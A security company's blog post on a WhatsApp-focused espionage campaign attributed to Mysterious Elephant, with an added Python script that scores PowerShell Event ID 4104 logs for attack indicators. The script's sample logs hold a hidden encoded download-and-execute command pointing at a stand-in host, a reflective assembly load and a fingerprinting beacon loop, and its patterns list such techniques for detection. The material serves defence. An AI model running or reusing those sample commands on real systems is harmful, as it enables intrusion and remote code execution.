WhatsApp cyberespionage: Silent data theft
- Cyberpeace Tech

- Jan 13
- 3 min read
In early 2025, a new WhatsApp cyberespionage operation was detected and attributed to the advanced persistent threat (APT) group known as Mysterious Elephant. The campaign has mainly targeted government institutions and organizations involved in foreign relations in Asia-Pacific countries, with the primary objective of stealing confidential information stored in and shared through WhatsApp.
Although the attacks are concentrated in countries such as Pakistan, Bangladesh, and Sri Lanka, this threat is a clear example of the risks also faced by public agencies, strategic companies, and diplomatic organizations in Mexico, especially those that rely on messaging applications for their daily communication.

New techniques for more sophisticated espionage
During this campaign, the attackers significantly changed their modus operandi. They now combine custom-developed tools with open source software in order to infiltrate targets more discreetly.
Initial access is usually gained through spear-phishing emails tailored to each victim, malicious documents, and the exploitation of software vulnerabilities that allow code to be executed without raising suspicion.
Once inside a system, the attackers seek to elevate privileges, map the internal infrastructure, and extract sensitive files such as official documents, images, and compressed archives.
PowerShell and covert remote control
One of the key elements of this operation is the intensive use of PowerShell scripts. These scripts execute malicious instructions, download and install additional malware payloads, and maintain unauthorized access for long periods of time. Because they rely on a legitimate system tool that is present on every Windows machine, the attackers blend in with normal administrative activity and reduce the chances of detection.
Among the tools identified is BabShell, a backdoor that grants the attackers remote control over compromised computers.
BabShell collects technical information about the system, such as the active user, the computer name, and network data, which lets the operators track each infected device individually. It also serves as the starting point for executing more advanced modules that run directly in memory, leaving few traces on disk and evading file-based security controls.
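The techniques described above (PowerShell as a launcher, encoded commands, payloads loaded straight into memory, host fingerprinting with the username and computer name) are exactly what PowerShell Script Block Logging (Windows Event ID 4104) exposes to defenders. The following Python is an added example for this article, not code from the original page, from Cyberpeace, or from Kaspersky's report, and it is not a signature for BabShell or Mysterious Elephant: it scores a handful of constructed 4104-style log lines against an assumed indicator list, decodes any -EncodedCommand payload (UTF-16LE wrapped in base64) before scanning it, and aggregates the results per host so that a machine accumulating several indicators stands out.

```python
"""Triage PowerShell Script Block Logging (Event ID 4104) records for
living-off-the-land indicators.

Added example: the log format, the sample lines and the indicator weights are
constructed for illustration and are not taken from any published report.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = r"-(?:e|ec|en|enc|EncodedCommand)"

# (tag, weight, pattern) -- weights are an assumption, tune them to your estate.
INDICATORS = [
    (tag, weight, re.compile(pattern, re.IGNORECASE))
    for tag, weight, pattern in [
        ("inline_exec", 3, r"\bIEX\b|Invoke-Expression"),
        ("downloader", 3, r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"),
        ("in_memory_load", 4, r"\[(?:System\.)?Reflection\.Assembly\]::Load"),
        ("encoded_cmd", 2, ENC_FLAG + r"\b"),
        ("hidden_noninteractive", 2,
         r"-(?:w|win|WindowStyle)\s+Hidden|-nop\b|-NonInteractive|ExecutionPolicy\s+Bypass"),
        ("host_fingerprint", 1,
         r"\bwhoami\b|\$env:USERNAME|\$env:COMPUTERNAME|Get-NetIPAddress|\bipconfig\b"),
        ("beacon_loop", 1, r"Start-Sleep|while\s*\(\s*\$true\s*\)"),
    ]
]

ENCODED_ARG = re.compile(ENC_FLAG + r"\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Constructed, simplified one-line rendering of a 4104 record.
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+eid=(?P<eid>\d+)\s+script=(?P<script>.*)$")


def decode_encoded_command(script: str):
    """Split an -EncodedCommand launcher into (wrapper, decoded payload).

    The base64 blob is removed from the wrapper so its random characters
    cannot accidentally match an indicator; the payload is scanned separately.
    """
    m = ENCODED_ARG.search(script)
    if not m:
        return script, None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return script, None
    wrapper = script[:m.start(1)] + script[m.end(1):]
    return wrapper, decoded


@dataclass
class ScriptScore:
    score: int = 0
    tags: set = field(default_factory=set)
    decoded: Optional[str] = None


def score_script(script: str) -> ScriptScore:
    """Score one script block; each indicator counts at most once per block."""
    wrapper, decoded = decode_encoded_command(script)
    result = ScriptScore(decoded=decoded)
    for text in (wrapper, decoded or ""):
        for tag, weight, pattern in INDICATORS:
            if tag not in result.tags and pattern.search(text):
                result.tags.add(tag)
                result.score += weight
    return result


@dataclass
class HostReport:
    score: int = 0
    tags: set = field(default_factory=set)
    flagged_blocks: int = 0


def triage(lines, threshold: int = 4) -> dict:
    """Aggregate 4104 records per host; blocks at or above threshold are flagged."""
    reports: dict = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m.group("eid") != "4104":
            continue
        res = score_script(m.group("script"))
        report = reports.setdefault(m.group("host"), HostReport())
        report.score += res.score
        report.tags |= res.tags
        if res.score >= threshold:
            report.flagged_blocks += 1
    return reports


def _encode_ps(cmd: str) -> str:
    """Build an -EncodedCommand argument the way an attacker's launcher would."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed sample records: two routine admin actions and three stages
# of a fictional intrusion on WS-014 (hidden encoded downloader, in-memory
# load of a blob from a world-writable folder, fingerprinting beacon loop).
SAMPLE_LOGS = [
    "2025-01-13T09:58:02Z host=WS-014 eid=4104 script=Get-ChildItem C:\\Reports | Measure-Object",
    "2025-01-13T10:02:11Z host=WS-014 eid=4104 script=powershell -nop -w hidden -enc "
    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"),
    "2025-01-13T10:02:45Z host=WS-014 eid=4104 script=$bytes = [IO.File]::ReadAllBytes('C:\\Users\\Public\\m.dat'); "
    "[System.Reflection.Assembly]::Load($bytes) | Out-Null",
    "2025-01-13T10:03:10Z host=WS-027 eid=4104 script=Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties LastLogonDate",
    "2025-01-13T10:05:00Z host=WS-014 eid=4104 script=while ($true) { $i = whoami; $h = $env:COMPUTERNAME; Start-Sleep -Seconds 300 }",
]

if __name__ == "__main__":
    for host, report in sorted(triage(SAMPLE_LOGS).items()):
        print(f"{host}: score={report.score} flagged_blocks={report.flagged_blocks} tags={sorted(report.tags)}")
```

Two design points matter in practice. First, scoring must happen after decoding: a launcher such as `powershell -nop -w hidden -enc ...` reveals almost nothing on its own, and the base64 blob is removed from the wrapper before matching so its random characters cannot trigger an indicator by chance. Second, aggregation per host is what surfaces the campaign pattern the article describes: a single `whoami` is noise, but a machine that in a few minutes produces a hidden encoded downloader, a reflective assembly load and a sleeping fingerprint loop deserves an analyst's attention even if each individual block looks ordinary.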
WhatsApp as the main target
A particularly worrying aspect of this WhatsApp cyberespionage campaign is its direct focus on extracting files shared through the application. The attackers developed specific components capable of collecting documents, photographs, and compressed archives exchanged in conversations, which represents a critical risk for organizations that handle sensitive information through messaging platforms.
In the Mexican context, where WhatsApp is one of the most widely used communication tools for both personal and professional purposes, this type of attack reinforces the need to adopt stricter security measures and clear policies on the use of messaging applications in work environments.
Infrastructure designed for stealth
The infrastructure used by this group is built for concealment. It relies on multiple domains, IP addresses, dynamic DNS records, and cloud services, which makes it difficult to track and attribute. This architecture lets the operators scale up quickly and keep their operations running persistently without being easily detected.
According to specialists from Kaspersky's research team, understanding the tactics of these groups, sharing threat intelligence, and strengthening security measures are key to reducing the impact of successful attacks.
Keeping systems up to date, monitoring networks, and training staff remain essential actions for protecting critical information.
At Cyberpeace, we believe that information is key to anticipating digital threats. Staying up to date on cybersecurity allows you to make better decisions and reduce risks. Prevention begins with knowledge.
Want to learn more about how to protect your information and strengthen your digital security? Follow us on our social media channels and stay up to date.